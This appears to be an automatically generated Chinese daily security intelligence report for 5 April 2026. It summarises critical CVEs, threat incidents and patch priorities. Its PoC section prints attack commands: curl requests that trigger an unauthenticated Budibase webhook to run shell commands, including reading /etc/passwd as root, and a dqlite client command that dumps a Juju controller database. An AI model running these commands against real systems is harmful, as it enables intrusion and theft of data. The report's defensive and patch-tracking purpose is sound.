每日安全情报报告 · 2026-04-05

每日安全情报报告 · 2026-04-05报告日期2026年4月5日星期日情报范围近48小时2026-04-03 ~ 2026-04-05风险级别说明 严重CVSS ≥ 9.0 高危CVSS 7.0-8.9 中危CVSS 4.0-6.9特别标注⚡ 在野利用 近24-48h披露 PoC已公开一、高危漏洞速报1. ⚡ CVE-2026-4370 — Canonical Juju TLS认证完全绕过CVSS 10.0字段详情CVE 编号CVE-2026-4370漏洞类型认证绕过CWE-295 / CWE-306受影响组件Canonical Juju 3.2.0 ~ 3.6.19 / 4.0 ~ 4.0.4CVSS 3.1 评分10.0临界严重披露日期2026-04-01修复版本Juju 3.6.20 / 4.0.5漏洞描述Juju 控制器内部的 Dqlite 数据库集群在新节点加入时不验证客户端 TLS 证书。任何能访问 Juju 控制器 Dqlite 端口的未认证攻击者均可直接加入数据库集群获得对所有数据的完全读写权限可升级权限、开放防火墙端口、篡改基础设施配置。攻击向量AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H无需认证、低复杂度、跨范围影响风险影响Juju 被广泛用于云基础设施自动化编排Kubernetes、OpenStack、AWS一旦被利用可导致整个云控制平面被接管。修复建议- 立即升级至 Juju 3.6.20 或 4.0.5 及以上版本- 通过防火墙严格限制对 Dqlite 端口的网络访问仅允许信任节点通信参考链接- NVD 漏洞详情- GitHub 安全公告 GHSA-gvrj-cjch-728p- 技术分析justappsec.com2. CVE-2026-35216 — Budibase 未认证 Webhook RCECVSS 9.0字段详情CVE 编号CVE-2026-35216漏洞类型OS 命令注入CWE-78受影响组件Budibase 开源低代码平台 3.33.4CVSS 3.1 评分9.0严重披露日期2026-04-03NVD 收录修复版本Budibase 3.33.4漏洞描述Budibase 3.33.4 之前版本中未经身份验证的攻击者可通过公开 Webhook 端点触发包含 Bash 步骤的自动化工作流实现在 Budibase 服务器上的远程代码执行。由于进程以容器内root 权限运行攻击者可完全控制服务器环境。漏洞根因自动化触发接口缺乏访问控制验证任意外部请求均可调用包含任意 Shell 命令的自动化流程。修复建议- 立即升级 Budibase 至 3.33.4 或以上版本- 审查现有自动化工作流移除或限制包含 Bash 命令步骤的公开 Webhook- 对 Budibase 实例增加网络访问控制避免直接暴露于公网参考链接- NVD 漏洞详情- GitHub 安全公告 GHSA-fcm4-4pj2-m5hf- CVEFeed 详情- Vulert 漏洞分析3. ⚡ CVE-2026-5281 — Google Chrome WebGPU 零日第4个2026 Chrome零日CISA KEV字段详情CVE 编号CVE-2026-5281漏洞类型Use-After-FreeWebGPU / Dawn 引擎受影响组件Google Chrome 146.0.7680.178CVSS 评分高危8.8披露日期2026-04-01带外紧急补丁在野利用⚡已确认在野利用CISA KEV 收录修复截止 2026-04-15漏洞描述Google Chrome 的 DawnWebGPU 后端实现中存在 Use-After-Free 漏洞是 2026 年第4 个在野利用的 Chrome 零日。成功利用可导致沙箱逃逸进而实现任意代码执行影响 Windows、macOS、Linux 全平台。CISA 联邦机构要求美国联邦机构须在2026年4月15日前完成修复否则视为合规违规。修复建议- 立即将 Chrome 更新至 146.0.7680.178 或更高版本地址栏输入chrome://settings/help触发自动更新- 企业环境通过 Group Policy 强制推送更新参考链接- Google Chrome 安全公告- BleepingComputer 报道- TheHackerNews 分析- CISA KEV 目录4. CVE-2026-5289 / CVE-2026-5290 / CVE-2026-5291 — Chrome 批量高危修复CVE 编号漏洞位置类型披露日期CVE-2026-5289Chrome NavigationUse-After-Free2026-04-01CVE-2026-5290Chrome CompositingUse-After-Free2026-04-01CVE-2026-5291Chrome WebGL不当实现信息泄露2026-04-01说明上述三个漏洞随同 CVE-2026-5281 一并在 Chrome 146 安全更新4月1日中修复共修复 21 个漏洞。CVE-2026-5289/5290 为 Use-After-Free 类型可能允许代码执行CVE-2026-5291 可导致敏感信息泄露。修复同上升级 Chrome 至 146.0.7680.178。参考链接- NVD CVE-2026-5289- CVEFeed CVE-2026-52915. ⚡ CVE-2026-20093 / CVE-2026-20160 — Cisco IMC Cisco ASA 高危漏洞CVSS 9.8字段详情CVE 编号CVE-2026-20093 / CVE-2026-20160受影响组件Cisco IMC认证绕过/ Cisco ASA未授权 RCECVSS 3.1 评分9.8严重披露日期2026-04-01 / 2026-04-02在野利用⚡ 已检测到主动扫描与利用活动漏洞描述-CVE-2026-20093Cisco IMC 认证绕过允许未认证攻击者绕过身份验证访问受保护的管理接口。CVSS 9.8无缓解措施需立即升级固件。-CVE-2026-20160Cisco ASA/SSM On-Prem 未授权 RCE影响思科安全管理产品无需认证即可实现远程代码执行无有效临时缓解方案。修复建议立即应用 Cisco 发布的安全补丁参阅 Cisco 安全公告。参考链接- April 2026 漏洞概览- Shield53 Cisco 补丁报告6. CVE-2025-15484 — WooCommerce Order Listener 插件未授权 RCECVSS 7.5字段详情CVE 编号CVE-2025-15484漏洞类型访问控制缺失Broken Access Control→ RCE受影响组件Order Notification for WooCommerce WordPress 插件 3.6.3CVSS 评分7.5高危披露日期2026-04-02受影响范围所有使用该插件且版本低于 3.6.3 的 WordPress 电商站点漏洞描述该 WordPress 插件覆盖了 WooCommerce 的权限检查机制对所有未经认证的请求授予完全访问权限允许未认证攻击者通过 REST API 接口实现远程代码执行可导致整个 WordPress 站点被完全控制。修复建议立即将 Order Notification for WooCommerce 插件升级至 3.6.3 或以上版本。参考链接- WP Firewall 漏洞分析- Wiz 漏洞数据库- CVEFeed 详情二、漏洞 PoC 情报PoC 1CVE-2026-35216 — Budibase 未认证 Webhook RCE PoC漏洞说明通过 Budibase 公开 Webhook 端点触发包含 Bash 命令的自动化流程实现以容器 root 权限执行任意系统命令。利用前提- 目标运行 Budibase 3.33.4 版本- 网络可达 Budibase 实例默认端口 10000- 存在包含Bash步骤的自动化工作流且已启用 Webhook 触发利用步骤概念验证# 步骤1枚举 Budibase 实例默认端口 10000 curl -s http://TARGET:10000/api/automations # 步骤2找到包含 Bash 步骤的自动化工作流 ID # 响应示例: {_id: auto_xxxxxxxx, steps: [{stepId: EXECUTE_BASH}]} # 步骤3通过公开 Webhook 端点触发自动化无需认证 curl -X POST http://TARGET:10000/api/webhooks/trigger/WEBHOOK_ID \ -H Content-Type: application/json \ -d {fields: {cmd: id whoami cat /etc/passwd}} # 步骤4查看执行结果root 权限 # 预期输出: uid0(root) gid0(root) groups0(root)修复提交GitHub Commit f0c731b参考来源- GitHub 安全公告 GHSA-fcm4-4pj2-m5hf- PulsePatch 技术分析PoC 2CVE-2026-4370 — Canonical Juju Dqlite TLS认证绕过 PoC漏洞说明Juju 控制器的 Dqlite 数据库端口默认 17666未验证客户端 TLS 证书允许攻击者伪装为合法节点加入数据库集群获取完全读写权限。利用前提- 目标运行 Juju 3.2.0-3.6.19 或 4.0-4.0.4- 网络可达目标 Juju 控制器的 Dqlite 端口默认 17666利用步骤概念验证# 步骤1扫描确认目标 Juju Dqlite 端口开放 nmap -sV -p 17666 TARGET_IP # 步骤2克隆 Dqlite 客户端工具利用缺少 TLS 验证的特性 git clone https://github.com/canonical/go-dqlite cd go-dqlite go build ./... # 步骤3尝试无证书连接利用漏洞服务端不校验客户端证书 # 连接时跳过客户端证书验证 ./dqlite-client --tls-no-client-cert --address TARGET_IP:17666 \ --cluster node1TARGET_IP:17666 \ --db juju .dump # 步骤4成功后可读取所有数据包括凭证、配置、密钥 # 或注入恶意节点 - 篡改控制器数据库 - 横向移动 # 修复升级至 Juju 3.6.20 / 4.0.5Dqlite 端口严格执行双向 TLS 认证参考来源- NVD CVE-2026-4370- GitHub 安全公告 GHSA-gvrj-cjch-728p- CVEReports 技术分析PoC 3CVE-2026-5281 — Chrome WebGPU UAF 在野利用参考框架漏洞说明Chrome WebGPUDawn 引擎Use-After-Free 漏洞已被 APT 组织用于水坑攻击和鱼叉式网络钓鱼活动中可实现沙箱逃逸。利用环境- Chrome 146.0.7680.178Windows/macOS/Linux- 触发路径恶意网页 → WebGPU API 调用 → UAF → RCE检测/防御方法# 检查 Chrome 版本是否已修复 # Windows PowerShell (Get-Item C:\Program Files\Google\Chrome\Application\chrome.exe).VersionInfo.FileVersion # 强制更新 Chrome # 在地址栏输入并访问 # chrome://settings/help # 若存在未完成更新会自动触发下载 # 企业级通过 GPO 强制推送 Chrome 更新 # 策略路径Computer Configuration Administrative Templates Google Google Chrome Auto Update参考来源- BleepingComputer 分析- CISA KEV 页面- Anavem 技术详情三、安全动态与威胁情报【事件 1】 Handala 伊朗黑客组织入侵以色列防务承包商 PSK Wind Technologies时间2026-04-02威胁类型国家级APT黑客行动主义伊朗抵抗轴心关联网络战组织Handala Hack Group于4月2日宣称成功入侵以色列防务承包商PSK Wind Technologies。该公司是以色列军事指挥中心和防空通信基础设施的主要设计商与运营商客户包括以色列国防军IDF核心系统。Handala 声称已从其内部网络中提取大量军事机密数据包括- 防空系统的通信协议架构图- 命令控制C2网络配置- 军事指挥系统的网络拓扑该组织此前曾入侵 FBI 局长邮件服务器及多家以色列关键基础设施单位惯用黑客信息战心理战三合一打击模式。参考链接- CyberPress 报道- IntelliNews 分析- Tornnews 报道【事件 2】 Everest 勒索软件组织宣称攻陷日产Nissan全球客户服务基础设施时间2026-04-01威胁类型勒索软件双重勒索模式Everest 勒索软件组织Ransomware-as-a-Service于 2026年4月1日将日本汽车巨头日产汽车Nissan Motor Co., Ltd.列为最新受害者宣称入侵其全球客户服务与销售数据GCSSD基础设施。Everest 采用双重勒索策略首先加密目标文件同时威胁公开窃取的敏感数据据称包含客户个人信息、员工数据及内部业务文件。这是日产近两年内第四次遭受重大网络安全事件凸显汽车行业数字化转型带来的持续威胁面扩大问题。参考链接- Netcrook 攻击事件报道- CybersecurityTimes 报道- CybersecurityNews 背景分析【事件 3】 Google 正式归因朝鲜 UNC1069 组织发起 Axios npm 供应链攻击时间2026-04-03威胁类型供应链攻击国家级APTGoogle 威胁情报团队正式将广受关注的Axios npm 包供应链攻击归因于朝鲜国家支持的威胁组织UNC1069以财务动机为主的朝鲜 APT 集群。本次攻击中UNC1069 通过入侵 Axios 包维护者账户向 npm 仓库推送了含恶意代码的伪造版本1.14.1 / 0.30.4植入跨平台远程访问木马RAT。Axios 每周下载量超1 亿次影响范围波及全球数十万 JavaScript/Node.js 项目。CISA 已发布供应链攻击预警建议所有使用 Axios 的项目1. 立即回退至已知安全版本1.7.x 系列的官方版本2. 审查 CI/CD 管道中的 npm 依赖锁定文件package-lock.json3. 启用 npm 包完整性验证npm audit --audit-levelcritical参考链接- TheHackerNewsGoogle 归因报道- CISA 供应链安全建议- Pixee 事件分析【事件 4】 April 2026 数据泄露浪潮15重大事件爆发时间2026年4月1日至5日威胁类型数据泄露、网络入侵根据最新汇总的安全情报2026年4月前5天已记录超过15 起重大数据泄露事件覆盖金融、汽车、防务、零售多个行业。典型事件包括Starbucks 源代码泄露威胁组织 ShadowByt3s 宣称窃取星巴克约10GB 专有源代码和运营固件疑为错误配置的云存储桶暴露日产 GCSSD 勒索如事件2所述以色列防务承包商 PSK Wind Technologies 入侵如事件1所述安全研究人员指出这一态势与地缘政治紧张升级高度相关国家支持的 APT 组织与纯财务动机的勒索软件组织呈现协同共振特征攻击频次和烈度均超2025年同期水平。参考链接- SharkStriker 2026年4月数据泄露汇总- Rankiteo 分析- TechEdAdvocate 威胁趋势分析【文章推荐 1】Microsoft 4月补丁星期二预告Secure Boot 证书危机迫近来源Zecurit / Microsoft MSRC预计发布日期2026年4月14日北京时间4月15日凌晨1:00微软 4 月补丁星期二Patch Tuesday将于2026年4月14日正式发布预计修复80-100个 CVE。本次更新有几个特别值得关注的背景Secure Boot 证书到期危机2011年签发的 Secure Boot 证书将于2026年6月26日到期4 月补丁是企业在到期前部署新证书的关键窗口期3月补丁质量问题延续3月发生多次更新失败和补丁撤回事件建议对 4 月更新提前在测试环境验证预期高密度关键漏洞基于 Q1 2026 趋势预计包含多个权限提升EoP、远程代码执行RCE和零日漏洞修复参考链接- Zecurit Patch Tuesday 分析- Microsoft 安全响应中心【文章推荐 2】Cisco 发布8个企业级高危漏洞补丁含2个严重级来源Shield53 / Cisco PSIRT发布日期2026-04-02Cisco 于4月2日集中发布针对多条企业产品线的安全更新修复包括 CVE-2026-20093Cisco IMC和 CVE-2026-20160Cisco ASA/SSM在内的8 个高危/严重漏洞其中 2 个被评定为严重CVSS 9.8。建议所有运行受影响 Cisco 产品的企业立即部署补丁。参考链接- Shield53 安全公告分析- Cisco 安全公告中心【文章推荐 3】CYFIRMA 2026-04-03 威胁情报周报地下犯罪生态持续演进来源CYFIRMA发布日期2026-04-03CYFIRMA 发布最新周度威胁情报报告重点指出-地下网络犯罪生态Underground Criminal Ecosystem正快速演进初始访问中间商IAB、勒索软件即服务RaaS、数据窃取工具商业化运营趋势加剧- Akira 勒索软件活动持续在联邦和执法领域施压- APT 组织正加速将AI自动化整合进侦察和漏洞扫描环节- 建议组织强化威胁情报驱动的主动防御策略参考链接- CYFIRMA 周报 2026-04-03四、今日修复优先级建议优先级CVE / 事件原因 P0 立即修复CVE-2026-5281 (Chrome WebGPU)在野利用CISA KEV4月15日联邦截止 P0 立即修复CVE-2026-4370 (Juju CVSS 10.0)满分漏洞云控制平面被接管风险 P0 立即修复CVE-2026-20093/20160 (Cisco)在野利用无缓解措施 P1 尽快修复CVE-2026-35216 (Budibase)CVSS 9.0PoC 公开低门槛利用 P1 本周修复CVE-2025-15484 (WooCommerce)影响数以万计的 WordPress 电商站 P2 关注跟进Axios npm 供应链 (UNC1069)已归因朝鲜APT审查依赖锁文件 P3 持续监控微软 4月 Patch Tuesday4月14日发布提前准备测试环境五、资源与参考CISA 已知利用漏洞目录KEVNVD 国家漏洞数据库MITRE CVE 官方平台TheHackerNews 安全资讯BleepingComputer 安全新闻GitHub Security AdvisoriesCYFIRMA 威胁情报报告由自动化安全情报系统生成 | 生成时间2026-04-05 10:15 CST本报告仅供安全专业人员参考请勿将 PoC 用于未授权测试环境